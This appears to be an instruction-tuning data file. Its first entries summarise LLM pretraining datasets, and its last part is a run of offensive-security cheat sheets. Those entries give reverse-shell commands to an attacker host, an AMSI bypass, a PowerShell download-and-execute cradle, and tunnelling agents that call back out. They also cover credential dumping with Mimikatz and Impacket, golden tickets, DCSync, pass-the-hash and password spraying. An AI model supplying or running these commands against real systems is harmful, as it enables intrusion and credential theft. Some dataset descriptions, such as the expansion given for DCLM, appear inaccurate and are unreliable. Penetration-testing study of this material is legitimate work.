expressions.","output":"MAGPIE addresses the challenge of semantic opacity in idioms — where meaning cannot be deduced from literal word definitions — by providing over 56,000 instances of 1,756 unique English idioms presented within short, highly varied textual contexts. This exposes the model to idioms in diverse syntactic and semantic environments, preventing memorization of fixed patterns. Complementing this, the IDEM dataset attaches specific emotion labels to nearly 10,000 idiom-containing sentences, teaching the model the affective weight and emotional resonance of figurative language — for example, that 'kicked the bucket' carries different pragmatic force than 'passed away' despite similar literal reference. Together, these datasets ensure the LLM understands both the non-literal meaning and emotional register of idiomatic expressions."},{"source":"english-master","instruction":"Summarize the Jigsaw Toxic Comment Classification dataset and its role in teaching ethical boundary adherence.","output":"The Jigsaw Toxic Comment Classification dataset contains 160,000 human-annotated Wikipedia talk page comments, categorized into distinct sub-labels including severe toxicity, insults, threats, and identity-based hate. This dataset serves as the primary mechanism for teaching the model nuanced content moderation: how seemingly benign words can be weaponized into abuse through context (e.g., 'interesting' said sarcastically to dismiss someone's identity), and conversely, how profanity can be used harmlessly for emphasis in colloquial contexts (e.g., 'That's f---ing awesome!' as positive exclamation). Training on Jigsaw ensures the LLM possesses ethical discernment and pragmatic awareness — knowing exactly when offensive language is unacceptable (harassment, hate speech) versus when it might be appropriate (creative writing, specific roleplay scenarios, casual conversation among consenting adults)."},{"source":"english-master","instruction":"Summarize the document's core argument about why indiscriminate scaling fails and what succeeds instead.","output":"The document's core argument is that achieving world-class English proficiency in LLMs cannot be achieved by indiscriminately expanding context windows or increasing parameter counts over raw, noisy web data. Such brute-force approaches yield statistically fluent but functionally brittle models that fail at sub-surface complexities like sarcasm, bridging anaphora, or graduate-level reasoning. Instead, success requires a meticulous, multi-stage data curation paradigm: (1) educationally filtered pre-training for structured exposition, (2) syntactic datasets for grammatical perfection and coreference resolution, (3) Chain-of-Thought and reasoning datasets for step-by-step logic, (4) literary and philosophical corpora for elegant prose, and (5) pragmatic datasets for sarcasm, humor, idioms, and profanity. Only this carefully sequenced symphony of specialized datasets produces a model that is genuinely 'PhD-smart,' deeply thoughtful, and capable of native-like communication."},{"source":"english-master","instruction":"Summarize the benchmarking performance of FineWeb-Edu on MMLU and other reasoning tasks.","output":"FineWeb-Edu demonstrates substantial empirical gains on knowledge- and reasoning-intensive benchmarks. On MMLU, models pretrained on FineWeb-Edu improve from 33% to approximately 37% accuracy. It also yields significant improvements on the AI2 Reasoning Challenge (ARC) and OpenBookQA, making it one of the most effective open educational web datasets for LLM pretraining."},{"source":"english-master","instruction":"Summarize the licensing and ethical compliance features of Common Corpus.","output":"Common Corpus is assembled exclusively from uncopyrighted or permissively licensed sources. All components are either public domain or distributed under licenses such as CC-By, CC0, MIT, Apache, or BSD. The dataset includes exhaustive documentation of provenance, licensing, and curation procedures, ensuring compliance with data security regulations and intellectual property laws. This design makes Common Corpus suitable for both scientific research and commercial AI deployment under emerging AI legislation."},{"source":"english-master","instruction":"Summarize the relationship between S2ORC, the Semantic Scholar Academic Graph (S2AG), and the overall Ai2 open data ecosystem.","output":"The Semantic Scholar Academic Graph (S2AG) is a large collection of over 200 million paper titles, abstracts, citations, and other metadata from open access papers, forming the largest open scientific literature graph. S2ORC builds on S2AG by adding structured full text for 8.1 million open access papers, with annotations for citations, figures, and tables. Together, these resources provide a comprehensive, machine-readable representation of the scientific literature, enabling tasks such as citation analysis, knowledge graph construction, and scientific language model pretraining."},{"source":"english-master","instruction":"Summarize the step-by-step instruction strategy for improving LLM dependency parsing accuracy using CoNLL-U format.","output":"A 2025 study proposes a step-by-step instruction strategy for LLM-based dependency parsing: first, predict universal part-of-speech (UPOS) tags for each token; second, predict syntactic heads and dependency labels using the UPOS tags as intermediate reasoning steps. This method uses a simplified CoNLL-U-like output format and achieves state-of-the-art accuracy on Universal Dependencies datasets across 17 languages without hallucination or data contamination. The approach highlights the effectiveness of explicit reasoning steps in LLM-based parsing, offering a scalable alternative to bracket-based methods."},{"source":"english-master","instruction":"Summarize the empirical performance gains achieved by GRAPE on Llama3.1-8B and other models.","output":"GRAPE significantly outperforms strong baselines across multiple models (Llama3.1-8B, Mistral-7B, Qwen2.5-7B). It achieves absolute gains up to 13.8% averaging across benchmarks compared to distilling from the strongest model, and maximum 17.3% improvements over training on 3 times more data. In realistic settings using post-training data for Tulu3 and Olmo-2, GRAPE outperforms baselines with 4.5 times the data by 6.1% and outperforms state-of-the-art data selection approaches by 3.9% on average. Remarkably, using only 1/3 of the data and half the number of epochs, GRAPE allows Llama3.1-8B to surpass Tulu3-SFT by 3.5%."},{"source":"english-master","instruction":"Summarize the Dolma dataset and its role as a 3-trillion-token open corpus for LLM pretraining.","output":"Dolma is an open corpus of three trillion tokens for language model pretraining research, released by the Allen Institute for AI. It aggregates data from Common Crawl, academic publications (via S2ORC), code repositories (GitHub), and social media (Reddit, Wikipedia). The corpus emphasizes transparency, providing detailed documentation of all curation decisions including filtering criteria, deduplication methods, and tokenization strategies. This enables reproducible pretraining experiments and direct comparison of data curation techniques."},{"source":"english-master","instruction":"Summarize the RedPajama-V2 dataset and its quality filtering approaches for open LLM pretraining.","output":"RedPajama-V2 is an open dataset for LLM pretraining, containing 30 trillion raw tokens from Common Crawl (July 2020–October 2023). It applies multiple quality filtering approaches: exact substring deduplication removing duplicated passages; heuristic quality scores based on document statistics; classifier-based filtering using fastText and a linear model; and MinHash deduplication with 5-grams. Processed subsets are available at different quality thresholds, enabling experiments on the trade-off between data quantity and quality. The dataset includes 38 billion quality-filtered tokens (high-quality subset) and 112 billion deduplicated tokens (medium-quality)."},{"source":"english-master","instruction":"Write a short paragraph describing the required paradigm shift in data curation as outlined in the introduction. Use formal academic tone.","output":"The necessary paradigm shift entails moving beyond monolithic web scraping toward a meticulously stratified data pipeline. This architecture comprises progressive stages: foundational pre-training for structural syntax, targeted instruction tuning for academic rigor and deep reasoning, stylistic alignment for world-class literary prose, and pragmatic disambiguation to handle sarcasm, humor, idioms, and profanity. Only through such a curated curriculum can an LLM transcend stochastic parroting and emerge as a nuanced, deeply thoughtful linguistic entity."},{"source":"english-master","instruction":"Write a technical note describing the curation pipeline of FineWeb-Edu, including the model used for annotation and the scoring mechanism.","output":"Curation pipeline for FineWeb-Edu: 1) Start from FineWeb, a 15-trillion-token corpus derived from 96 Common Crawl snapshots. 2) Sample 460,000 candidate texts. 3) Use Llama-3-70B-Instruct to annotate each text with an additive educational score (0-5). 4) Train a linear regressor on Snowflake-arctic-embed-m embeddings to predict scores for the entire FineWeb corpus. 5) Apply a threshold of 3 or higher. 6) Retain 5.4 trillion tokens as FineWeb-Edu. This automated, scalable filtering prioritizes academic and structured content over noisy web text."},{"source":"english-master","instruction":"Write a brief summary of the structural diversity datasets mentioned after Common Corpus (The Pile, GneissWeb, ProX framework). Include their sizes and key features.","output":"The Pile (825 GB) combines 22 diverse high-quality sources including academic publications (arXiv, PubMed Central), GitHub repositories, and medical text, improving cross-disciplinary vocabulary. GneissWeb (~10 trillion tokens) uses exact substring deduplication and an ensemble of quality filters, outperforming FineWeb-V1.1.0 by 2.73 percentage points across 11 benchmarks. The ProX framework (Programming Every Example) uses a lightweight 0.3B-parameter language model to write and execute targeted cleaning programs (e.g., HTML stripping, string normalization) for each record in datasets like C4, RedPajama-V2, and DCLM, ensuring a pristine foundational corpus."},{"source":"english-master","instruction":"Write a technical description of the C4_200M synthetic dataset and its purpose in grammatical error correction training.","output":"The C4_200M synthetic dataset comprises 200 million sentence pairs where grammatical errors have been artificially introduced into clean text. Each pair consists of an error-containing sentence and its corrected version. The synthetic generation allows controlled sampling of specific error types (e.g., tense mismatches, subject-verb disagreement, punctuation errors). This dataset serves as a massive complement to real learner corpora like Lang-8, enabling the LLM to encounter a diverse, balanced distribution of grammatical mistakes. Because native and non-native error patterns differ, C4_200M ensures the model is robust against all forms of input degradation, making it capable of correcting errors from any user population."},{"source":"english-master","instruction":"Write a technical explanation of the SCAR framework and how it selects training data for stylistic consistency.","output":"The SCAR (Style Consistency-Aware Response Ranking) framework automates data selection for stylistic tuning. It operates on two key elements: (1) linguistic form — the surface features of text (punctuation, sentence length, register markers); and (2) instructional surprisal — how unexpected the response is given the instruction. SCAR ranks all instruction-response pairs in a training set by their stylistic consistency, then selects the most consistent examples. In practice, fine-tuning LLMs on as little as 0.7% of the full dataset — the highest-ranked examples — matches or surpasses the performance of models trained on entire, uncurated datasets. This efficiency comes from eliminating stylistically inconsistent or noisy examples that would otherwise degrade the model's register adherence."},{"source":"english-master","instruction":"Write a technical description of the FACT and RACE evaluation frameworks introduced in DeepResearch Bench.","output":"DeepResearch Bench introduces two novel evaluation frameworks for assessing deep research agents. RACE (Reference-based Adaptive Criteria-driven Evaluation) evaluates the quality of generated research reports by adaptively applying criteria based on reference answers — it measures coherence, completeness, and methodological soundness. FACT (Framework for Factual Abundance and Citation Trustworthiness) assesses the model's citation practices through two metrics: effective citation count (how many claims are properly supported) and overall citation accuracy (whether citations actually support the claims they accompany). By fine-tuning LLMs on data scoring highly on FACT, the model learns to automatically embed context, origin, and mechanism into its answers, mimicking the rigorous citation standards of peer-reviewed literature rather than generating unsupported assertions."},{"source":"english-master","instruction":"Write a technical description of the LongPage dataset and how it enables hierarchical narrative planning over extended contexts.","output":"The LongPage dataset addresses long-horizon reasoning for creative writing by providing 300 full-length books, each ranging from 40,000 to over 600,000 tokens. Crucially, each book is accompanied by hierarchical reasoning traces — structured annotations that map narrative logic across the entire text. These traces include character archetypes (personality consistency), world rules (setting constraints), scene breakdowns (event sequencing), and thematic coherence (motif tracking). Functionally, these traces act as 'Chain of Thought for creative writing,' explicitly showing the model how to plan and maintain logical consistency over massive context windows. Training on LongPage ensures the model does not lose its train of thought when deep-diving into complex, multi-page English responses — whether writing a novel, a legal brief, or a philosophical treatise."},{"source":"english-master","instruction":"Write a technical description of the Wiki Neutrality Corpus (WNC) and its role in teaching objective, academic prose.","output":"The Wiki Neutrality Corpus (WNC) is a Text Style Transfer dataset specifically designed for neutralizing subjectivity bias in writing. It consists of pairs of Wikipedia sentences: one version containing biased or emotionally loaded language, and a neutralized version that adheres to Wikipedia's Neutral Point of View policy. Training on WNC teaches the LLM to identify subjective language patterns — loaded adjectives ('horrific', 'brilliant'), framing verbs ('claimed' vs 'stated', 'admitted' vs 'explained'), and evaluative hedges ('controversially', 'fortunately'). The model learns to replace these with objective, academic equivalents: 'claimed' becomes 'stated', 'horrific event' becomes 'event', 'fortunately' is removed entirely. This capability is essential for generating scholarly prose that prioritizes factual reporting over rhetorical persuasion, a hallmark of world-class academic English."},{"source":"english-master","instruction":"Write a technical description of the Ironic Corpus and how it distinguishes sarcasm from situational irony.","output":"The Ironic Corpus is a human-annotated dataset designed to distinguish between closely related but distinct rhetorical devices. It provides fine-grained labels separating situational irony (an event or outcome that contradicts expected or intended results — e.g., a fire station burning down) from verbal sarcasm (a statement whose literal meaning opposes the speaker's intended meaning — e.g., 'Great job' after a failure). This distinction is crucial because both phenomena involve contradiction, but they operate at different levels: irony at the level of events, sarcasm at the level of utterance meaning. Without explicit training on this distinction, LLMs conflate all non-literal, contradictory-sounding text with sarcasm, leading to false positives. The Ironic Corpus provides the annotation granularity needed for the model to correctly classify each device based on whether the contradiction is situational or verbal, enabling precise pragmatic understanding across diverse rhetorical forms."},{"source":"english-master","instruction":"Write a technical description of the SlangLLM framework and the OpenSubtitles-Slang dataset for training contemporary colloquial understanding.","output":"The SlangLLM framework, trained on the OpenSubtitles-Slang dataset, addresses the challenge of rapidly evolving contemporary slang in natural language processing. OpenSubtitles-Slang extracts slang usage from messy, real-world conversational contexts within movie and television subtitles — capturing how slang actually appears in natural dialogue (with interruptions, false starts, overlapping speech, and register mixing). This contrasts with curated or dictionary-based slang datasets that present sanitized, context-free definitions. SlangLLM then implements dynamic detection (identifying which words or phrases function as slang in a given context) and contextual filtering (determining when slang is appropriate to generate vs. when formal language is required). This training ensures the model understands the fluidity of modern colloquialisms — including internet-born terms, regional expressions, and generational slang — preventing it from sounding overly robotic, rigid, or anachronistic when users prompt it to adopt a casual, friendly persona."},{"source":"english-master","instruction":"Write a technical description of the Pragmatic Category Table from the document, summarizing all six pragmatic dimensions and their datasets.","output":"The Pragmatic Category Table from the document organizes six dimensions of non-literal language mastery for LLMs. (1) Sarcasm/Irony: SARC (1.3M Reddit comments) and PodSarc (9.6-second podcast segments) teach detection of opposite intended meaning via extended conversational context. (2) Humor/Satire: Deceptive Humor Dataset provides Satire Levels 1-3 across five archetypes (Dark Humor, Irony, Social Commentary, Wordplay, Absurdity), enabling generation and comprehension of subtle wordplay, dark humor, and social commentary. (3) Idioms: MAGPIE provides 56,000+ instances of 1,756 unique idioms across varied contexts, preventing literal misinterpretation of semantic opacity. (4) Slang: SlangLLM with OpenSubtitles-Slang maps contemporary internet colloquialisms, ensuring fluid casual interaction. (5) Profanity: Surge AI catalogs 1,600+ profanities with severity scale 1-3 and semantic target categorization. (6) Toxicity: Jigsaw provides 160,000 labeled comments with sub-labels (severe toxicity, insults, threats, identity-based hate). Together, these six dimensions enable an LLM to understand language as it is actually used — with all its irony, humor, idiom, slang, and emotional intensity — while maintaining ethical boundaries."},{"source":"english-master","instruction":"Write a final synthesis paragraph describing the ultimate vision of an LLM trained according to this document's paradigm.","output":"The ultimate vision of an LLM trained according to this document's paradigm is a model that transcends the limitations of a stochastic parrot — a system that does not merely predict plausible next tokens but genuinely understands English at a PhD level. This model would demonstrate: graduate-level reasoning on GPQA and MMLU-Pro without relying on shallow heuristics; flawless grammatical precision including mastery of bridging anaphora and complex multi-clause dependencies; deep philosophical contemplation through Socratic dialogue and ethical reasoning; native-like pragmatic competence including accurate sarcasm detection, context-appropriate humor generation, idiom comprehension, and fluid slang usage; and ethical discernment that distinguishes casual banter from targeted harassment. It would shift seamlessly from the ornate elegance of Victorian prose to the minimalist clarity of technical documentation, from the formal register of legal argumentation to the casual warmth of friendly conversation. In short, it would emerge not as a brittle text generator but as an elite, deeply thoughtful, highly nuanced linguistic entity — a model that truly understands English better than the average human and communicates with world-class proficiency, wisdom, and wit."},{"source":"english-master","instruction":"Write a technical note describing the classifier training details for FineWeb-Edu, including dataset size, epochs, and F1 scores.","output":"The FineWeb-Edu classifier is trained on 450,000 samples annotated by Llama-3-70B-Instruct with educational scores 0–5. A classification head with single regression output is added to Snowflake-arctic-embed-m. Training runs for 20 epochs with learning rate 3e-4 while embedding and encoder layers remain frozen. The model achieves 82% F1 score when converted to a binary classifier using threshold 3. Weighted average F1 across all score levels is 0.71, with individual class performance varying due to annotation noise."},{"source":"english-master","instruction":"Write a technical description of the language coverage in Common Corpus beyond English.","output":"Common Corpus provides multilingual coverage ranging from high-resource European languages to low-resource languages rarely represented in pretraining datasets. Open Culture spans at least 13 major languages (French, English, German, Spanish, Portuguese, Italian, Dutch, Luxembourgish, Danish, Swedish, Serbian, Czech, Greek) plus significant representation in Arabic, Bengali, Latin, Persian, Russian, Sanskrit, and Urdu. Open Science focuses primarily on English (approximately 85%) with substantial French, Spanish, and German content. Open Semantic provides Wikidata natural language renditions in 300 languages. This breadth enables cross-lingual transfer learning and supports the model's understanding of English through comparative linguistic structures."},{"source":"english-master","instruction":"Write a technical note on the inline annotation features of S2ORC full text (citations, figures, tables).","output":"S2ORC's structured full text includes automatically-detected inline annotations for three key elements. Citation mentions: any reference to another paper (e.g., '(Smith, 2020)') is detected and linked to the resolved bibliographic entry in S2AG. Figure mentions: references to figures within the paper (e.g., 'as shown in Figure 3') are annotated and linked to the figure's location. Table mentions: references to data tables are similarly annotated and linked. These annotations enable the model to learn the discourse functions of citations (supporting claims), figures (visual evidence), and tables (data presentation), critical for generating authentic scientific writing."},{"source":"english-master","instruction":"Write a technical description of how bridging anaphora is encoded in CoNLL-U's MISC field using CorefUD standards.","output":"In the CorefUD (Coreference in Universal Dependencies) framework, bridging anaphora annotations are stored as attribute-value pairs in the MISC column of CoNLL-U files. For a bridging anaphor like 'the door' in 'There is a house. The door is red', the annotation includes a bridging link to the previously mentioned 'house' using attributes such as 'Bridge=house' or 'Referent=house'. This encoding allows explicit representation of the inferential relationship between entities that are not coreferential (the door is not the same as the house) but are semantically linked. Multiple bridging relations can be encoded per token, enabling training of LLMs to resolve implicit references across sentence boundaries."},{"source":"english-master","instruction":"Write a technical description of GRAPE's response selection process for a single instruction, contrasting it with standard SFT data collection.","output":"In standard SFT data collection, an instruction is paired with a response sampled from a strong external LLM (e.g., GPT-4) or human annotators, regardless of whether that response matches the target model's distribution. In GRAPE, for each instruction, the system first gathers multiple candidate responses from various sources (multiple LLMs, humans, or both). For each candidate, the target model computes the log probability (or perplexity) of the response given the instruction. The candidate with the highest probability (lowest perplexity) is selected — this is the response the target model 'most wants to generate' based on its pretrained distribution. The selected instruction-response pair is then added to the SFT dataset. This ensures every training example is distributionally congruent with the model, minimizing the need for weight adjustment during fine-tuning."},{"source":"english-master","instruction":"Write a technical note on the tokenization and deduplication strategies used in Dolma, based on 2025 documentation.","output":"Dolma implements per-document deduplication using MinHash with 13-gram shingles, 16 hash functions per band, and Jaccard similarity threshold of 0.8. This removes near-duplicate documents while preserving legitimate similar content. For tokenization, Dolma uses the GPT-NeoX-20B tokenizer with a vocabulary size of 50,257 tokens, applying byte-level byte-pair encoding (BPE). The corpus also includes URL-based filtering to remove adult content, language identification using fastText with confidence threshold 0.8 (English only), and heuristic filters removing documents with excessive repetition or outlier lengths."},{"source":"english-master","instruction":"Write a technical description of DCLM (Data Compaction for Language Models) and its integration with ProX for scalable refinement.","output":"DCLM (Data Compaction for Language Models) is a framework that reduces pretraining data size while preserving informational content. It identifies and removes redundant passages within and across documents using semantic similarity hashing and perplexity-based importance scoring. DCLM can reduce dataset size by 50-80% while maintaining or improving downstream task performance. ProX integrates with DCLM as a preprocessing step: ProX first performs sample-wise cleaning (HTML stripping, normalization, anomaly removal) on raw documents. The cleaned output is then fed to DCLM for compaction. This two-stage pipeline ensures that DCLM operates on clean, standardized text, preventing artifacts from being mistakenly identified as informative content and retained."},{"source":"dynamic","instruction":"Rust memory safety guarantees through ownership and borrowing","output":"Safe Rust is the true Rust programming language. It provides a secure foundation for writing fast, memory-safe applications."},{"source":"cyber-tools","instruction":"How to use nmap for network scanning?","output":"nmap - network scanning. Key commands: nmap -sV -sC <target> (version + default scripts), nmap -sS <target> (stealth SYN), nmap -O <target> (OS detection), nmap -p- <target> (all 65535 ports), nmap -sU -p <ports> <target> (UDP scan), nmap --script=vuln <target> (vuln scan), nmap -A <target> (aggressive all-in-one). Output: -oN (normal), -oX (XML), -oG (greppable). Timing: -T0 (paranoid) to -T5 (insane)."},{"source":"cyber-tools","instruction":"How to use masscan for fast port scanning?","output":"masscan - high-speed port scanner. Key commands: masscan <target> -p<ports> --rate=<packets/sec> (scan at specified rate). masscan 10.0.0.0/8 -p80,443 --rate=1000 (class A scan). masscan <target> -p0-65535 --rate=10000 --output-format json -oJ scan.json. Must run as root on Linux. Exclude: --excludefile exclude.txt. Output formats: -oL (list), -oJ (JSON), -oB (binary). Typical rates: 100-100000 packets/sec."},{"source":"cyber-tools","instruction":"How to use Metasploit for exploitation?","output":"Metasploit (msfconsole) - exploitation framework. Commands: msfconsole (launch), search <exploit> (search), use <module> (select), show options (view params), set <PARAM> <value> (configure), run/exploit (execute), sessions -l (list active), sessions -i <id> (interact). Key modules: exploit/multi/handler (payload handler), exploit/windows/smb/ms17_010_eternalblue (EternalBlue), post/windows/gather/hashdump (hash extraction). Payloads: windows/x64/meterpreter/reverse_tcp, linux/x64/shell/reverse_tcp."},{"source":"cyber-tools","instruction":"How to use BloodHound for Active Directory enumeration?","output":"BloodHound - AD attack path mapper. Steps: 1) Run SharpHound on target: SharpHound.exe -c All --zipfilename output. 2) Collect rights, group memberships, ACLs, sessions. 3) Load ZIP into BloodHound UI (neo4j backend). 4) Use queries: Find all Domain Admins, Shortest Paths to Domain Admins, Find Computers with Unconstrained Delegation. Key edges: MemberOf, AdminTo, HasSession, CanRDP, ForceChangePassword, GenericAll, DCSync. Install: neo4j console, then BloodHound --no-sandbox."},{"source":"cyber-tools","instruction":"How to use Mimikatz for credential dumping?","output":"Mimikatz - Windows credential extraction. Key commands (run as admin): privilege::debug (enable debug), sekurlsa::logonpasswords (dump passwords from LSASS), lsadump::sam (dump SAM), lsadump::lsa /patch (dump LSA secrets), lsadump::dcsync /user:krbtgt (DCSync attack), kerberos::golden /user:admin /domain:DOMAIN /sid:S-1-... /krbtgt:HASH /ptt (golden ticket). vault::cred /list (Windows credentials). sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (pass-the-hash)."},{"source":"cyber-tools","instruction":"How to use Hashcat for password cracking?","output":"Hashcat - GPU-accelerated password cracking. Commands: hashcat -m <mode> -a <attack> hash.txt wordlist.txt. Modes: 1000 (NTLM), 100 (SHA1), 13100 (Kerberos TGS), 5600 (NetNTLMv2), 2100 (Domain Cached Creds), 18200 (AS-REP), 7500 (Bitcoin). Attacks: -a 0 (wordlist), -a 3 (mask/brute), -a 6 (wordlist+mask), -a 7 (mask+wordlist). Mask: ?l (lower), ?u (upper), ?d (digit), ?s (special), ?a (all). Rule-based: -r rule.rule. Optimize: -O (optimized), --force, -w 4 (high workload)."},{"source":"cyber-tools","instruction":"How to use John the Ripper for password cracking?","output":"John the Ripper - CPU password cracker. Commands: john hash.txt (auto-detect hash). john --format=nt hash.txt (force NTLM). john --wordlist=wordlist.txt hash.txt (wordlist). john --rules hash.txt (with mangling rules). john --show hash.txt (show cracked). john --incremental hash.txt (brute force). unshadow passwd shadow > combined.txt (combine Linux creds). Common formats: nt (NTLM), raw-sha1, krb5tgs, bcrypt, descrypt, md5crypt."},{"source":"cyber-tools","instruction":"How to use Wireshark/tshark for packet analysis?","output":"Wireshark/tshark - packet analysis. tshark commands: tshark -r capture.pcap (read file), tshark -r capture.pcap -Y 'http.request' (filter HTTP), tshark -r capture.pcap -T fields -e ip.src -e ip.dst (extract IPs). Display filters: tcp.port==443, ip.addr==10.0.0.1, dns.qry.name contains example.com, http.request.method==POST, tls.handshake.type==1 (Client Hello). Capture filters: port 80, host 10.0.0.1, not arp. Follow: HTTP, TCP, UDP streams via right-click. Statistics: Protocol Hierarchy, Conversations, Endpoints."},{"source":"cyber-tools","instruction":"How to use sqlmap for SQL injection?","output":"sqlmap - SQL injection automation. Commands: sqlmap -u 'http://target.com/page?id=1' (basic test). sqlmap -u 'http://target.com/page?id=1' --dbs (enumerate databases). sqlmap -u 'http://target.com/page?id=1' -D dbname --tables (list tables). sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump (dump data). sqlmap -r request.txt (from raw HTTP request). sqlmap -u 'http://target.com/page?id=1' --os-shell (OS shell). sqlmap -u 'http://target.com/page?id=1' --batch --random-agent (stealth). Risk/level: --level 3 --risk 2 (deeper testing)."},{"source":"cyber-tools","instruction":"How to use Gobuster/ffuf for web fuzzing?","output":"Gobuster + ffuf - web fuzzing tools. Gobuster: gobuster dir -u http://target.com -w wordlist.txt (directory brute), gobuster dns -d target.com -w subdomains.txt (subdomain), gobuster vhost -u http://target.com -w hosts.txt (vhost). ffuf: ffuf -u http://target.com/FUZZ -w wordlist.txt (directory), ffuf -u http://target.com/page?param=FUZZ -w params.txt (parameter), ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 403 (filter status). ffuf -u http://target.com/FUZZ -H 'Host: FUZZ.target.com' -w hosts.txt (vhost fuzz). Extensions: -x .php,.asp,.aspx,.jsp."},{"source":"cyber-tools","instruction":"How to use Hydra/Medusa for brute force attacks?","output":"Hydra - network login brute forcer. Commands: hydra -l admin -P pass.txt ssh://192.168.1.1 (SSH), hydra -L users.txt -P pass.txt rdp://target (RDP), hydra -l admin -P pass.txt smb://target (SMB), hydra -l admin -P pass.txt ftp://target (FTP), hydra -L emails.txt -P pass.txt smtp://target (SMTP), hydra -l admin -P pass.txt http-post-form '/login:user=^USER^&pass=^PASS^:F=incorrect' (web form). -t <threads> (parallel tasks), -vV (verbose). Output: -o results.txt. Medusa has similar syntax with -M <module> -h <host> -U users -P passwords."},{"source":"cyber-tools","instruction":"How to use Impacket tools for Windows protocol attacks?","output":"Impacket - Python Windows protocol tools. Key scripts: impacket-secretsdump DOMAIN/user:pass@target (DCSync/dump hashes). impacket-psexec DOMAIN/user:pass@target (remote execution via SMB). impacket-wmiexec DOMAIN/user:pass@target (WMI execution). impacket-smbexec DOMAIN/user:pass@target (SMB exec without touching disk). impacket-GetUserSPNs DOMAIN/user:pass -request (Kerberoast). impacket-GetNPUsers DOMAIN/ -request -no-pass (AS-REP roast). impacket-ticketer -nthash HASH -domain DOMAIN -user admin (golden ticket). impacket-rpcdump target (RPC endpoint mapper)."},{"source":"cyber-tools","instruction":"How to use Responder for LLMNR/NBT-NS poisoning?","output":"Responder - name resolution poisoning. Usage: sudo responder -I eth0 (poison all protocols on interface). sudo responder -I eth0 -w (enable WPAD). sudo responder -I eth0 -r (enable MySQL auth capture). sudo responder -I eth0 -v (verbose). Captured: SMBv2 NTLMv2 hashes, HTTP basic auth, Kerberos tickets in logs/SMB-*.txt. Analysis with: john or hashcat -m 5600 captured_hash.txt. Cleanup after test. Off: -A (analyze mode, no poisoning). Combine with ntlmrelayx for relay attacks."},{"source":"cyber-tools","instruction":"How to use Ligolo-ng for network tunneling?","output":"Ligolo-ng - lightweight tunneling/pivoting. Setup: 1) Start proxy on attacker: ligolo-proxy -selfcert -laddr 0.0.0.0:443. 2) Deploy agent on target: ligolo-agent -connect attacker.com:443 -ignore-cert. 3) In proxy: session (list), session <id> (select), ifconfig (see routes), listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:8080 (forward port). Routing: ip link set ligolo up, ip route add 10.10.0.0/24 dev ligolo (add routes). Windows agent: ligolo-windows-amd64.exe -connect attacker.com:443 -ignore-cert."},{"source":"cyber-tools","instruction":"How to use Chisel for fast TCP/UDP tunneling?","output":"Chisel - fast TCP/UDP tunnel over HTTP. Server (attacker): chisel server -p 8000 --reverse. Client (target): chisel client attacker.com:8000 R:8001:localhost:80 (forward port 8001 to target's port 80). chisel client attacker.com:8000 R:socks (SOCKS5 proxy on server). chisel client attacker.com:8000 R:0.0.0.0:8443:10.10.0.1:443 (pivot to internal host). One binary for all platforms. Use --fingerprint for mutual auth. Add --keepalive to maintain connection. Windows: chisel.exe client attacker.com:8000 R:socks."},{"source":"cyber-tools","instruction":"How to use Netcat for networking and reverse shells?","output":"Netcat/ncat - networking utility. Reverse shell listener: nc -lvnp 4444 (listen), nc -e /bin/sh attacker.com 4444 (Linux send), ncat.exe -e cmd.exe attacker.com 4444 (Windows). Port scan: nc -zv target 1-1000 (TCP scan), nc -zvu target 53 (UDP). File transfer: nc -lvp 4444 > file (receive), nc attacker.com 4444 < file (send). Banner grab: echo 'GET / HTTP/1.0\r\n' | nc target.com 80. Chat: nc -lvp 4444 (host), nc host.com 4444 (connect). Bind shell: nc -lvnp 4444 -e /bin/sh."},{"source":"cyber-tools","instruction":"How to use PowerShell for cybersecurity tasks?","output":"PowerShell - Windows scripting for security. Key cmdlets: Get-Process (list processes), Get-Service (services), Get-WmiObject Win32_ComputerSystem (system info), Get-WmiObject Win32_UserAccount (user accounts). Remote: Invoke-Command -ComputerName target -ScriptBlock {cmd} (remote exec), Enter-PSSession target (interactive). AMSI bypass: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true). Execution: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64>. Download cradle: IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1')."},{"source":"cyber-tools","instruction":"How to use Python for cybersecurity scripting?","output":"Python - security scripting. Key libraries: requests (HTTP), socket (networking), scapy (packet manipulation), paramiko (SSH), impacket (Windows protocols), cryptography, pycryptodome (crypto), pywinrm (WinRM), dnspython (DNS). Common patterns: import requests; r = requests.get('http://target.com', headers={'User-Agent': 'Mozilla/5.0'}). Socket: s.connect(('host', port)); s.send(data); s.recv(1024). Subprocess: import subprocess; result = subprocess.run(['nmap','-sV','target'], capture_output=True, text=True). Threading for parallel tasks. Argument parsing with argparse. JSON handling with json module."},{"source":"cyber-tools","instruction":"How to use curl for HTTP requests in cybersecurity?","output":"curl - HTTP client for testing. Commands: curl -v http://target.com (verbose). curl -k https://target.com (ignore TLS errors). curl -X POST -d 'data=value' http://target.com (POST). curl -b 'session=abc' -c cookies.txt http://target.com (cookies). curl -H 'Authorization: Bearer TOKEN' http://target.com/api (auth header). curl -A 'Mozilla/5.0' -e http://referrer.com http://target.com (spoof user-agent + referer). curl -o output.html -s -S http://target.com (save output, silent). curl --proxy http://proxy:8080 http://target.com (via proxy). curl --path-as-is -u admin:admin http://target.com (basic auth)."},{"source":"cyber-tools","instruction":"How to perform pass-the-hash attacks?","output":"Pass-the-Hash - authenticate with NTLM hash. Tools: impacket-psexec DOMAIN/admin@target -hashes LMHASH:NTHASH (psexec). impacket-wmiexec DOMAIN/admin@target -hashes LMHASH:NTHASH (WMI). impacket-smbexec same syntax (SMB). Mimikatz: sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (creates process with hash). CrackMapExec: crackmapexec smb target -u admin -H NTHASH -x 'whoami' (remote exec). Evil-WinRM: evil-winrm -i target -u admin -H NTHASH (WinRM shell). Native: winexe -U DOMAIN/admin%HASH //target cmd.exe."},{"source":"cyber-tools","instruction":"How to use CrackMapExec (CME) for network assessment?","output":"CrackMapExec (CME) - Windows network assessment. Commands: crackmapexec smb target -u users.txt -p pass.txt (password spray). crackmapexec smb target -u admin -H NTHASH --local-auth (pass-the-hash). crackmapexec smb target -u admin -H NTHASH -x whoami (remote exec). crackmapexec smb target --sessions (logged-in users). crackmapexec smb target --shares (list shares). crackmapexec smb target --sam (dump SAM). crackmapexec smb target --lsa (dump LSA). 